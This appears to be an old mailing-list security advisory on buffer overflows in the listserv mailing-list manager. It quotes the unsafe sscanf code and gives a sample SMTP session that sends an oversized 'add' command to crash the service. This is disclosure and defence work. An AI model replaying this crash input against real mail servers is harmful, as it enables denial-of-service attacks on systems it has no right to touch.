(no subject)

PLaGuEZ (root@MEAT.PLAGUEZ.ORG)
Sat, 01 Jan 1994 17:50:59 +0100

listserv buffer overflow(s)

plaguez security advisory no. 4

listserv buffer overflow(s)

Hello all,

[forget it if it's known stuff :), however, the archives
from sunsite still have this hole.]

i have found several buffer overflows in listserv,
a widely used mailing-lists managment program.

By exploiting those vulnerabilities, malicious hackers can
remotely execute arbitrary commands on the target machine:
typically, place backdoors on the system or remove users'
mail files, as listserv requires to run as sgid 'mail'.

Though, the impact is harmless because it is almost
impossible to predict the parameters to use for the
actual overflow, i.e. stack prediction and buffer size.
This hole is still annoying because it can provide a
efficient DOS attack: the attacker would repeatly
connect to the target host and send an oversized buffer,
resulting in many segfaults on the target system.

Technical stuff:
----------------
User commands are sent directly through the body of the
message, where users can write whatever they want.
Potential buffer overflows are located in the functions
that handle those commands. ( main() bof are mostly
harmless)
e.g:
+file subscribe.c,

function subscription(char *from,char *command,int add,
int outsider)
{ char tmp[256], grp[256], adr[256];
[...]
i=sscanf(command,"%s%s%s",tmp,adr,grp);
[...]
}
command is there a user command that hasnt been
modified. An overflow may occure there.

Sample exploit:
---------------

$ telnet xxxxxx.xxx 25

Trying 123.123.123.123...
Connected to 123.123.123.123
Escape character is '^]'.
220 xxxxxx.xxx ESMTP Sendmail 8.8.5/8.8.2; Fri, 20 Jun 1997 08:54:52 -0400
MAIL FROM: oooops@oooops.org
250 ooops ... Sender ok
RCPT TO: Listserv
250 Listserv ... Recipient ok
DATA
254 Enter mail, end with "." on a line by itself
From: noone

add aaaaaaaaaaaaaaa[...lotsa chars go here]aaaaaaaaaaaaa aaaaaa aaaaaa
.
250 RAFZ04965 Message accepted for delivery
QUIT
221 xxxxxxx.xxx closing connection

the listserv handling this session with bof and then crash.

Fix:
----
Sorry I'm too lazy to make a fix... A possible one would be
to use dynamic length strings, or (easier to implement)
strip each command down to its 200 first characters for
example.

that's all for this time,

plaguez

------------------------
plaguez / libpcap
dube0866@eurobretagne.fr
http://www.innu.org
------------------------
ln -sf flames /dev/null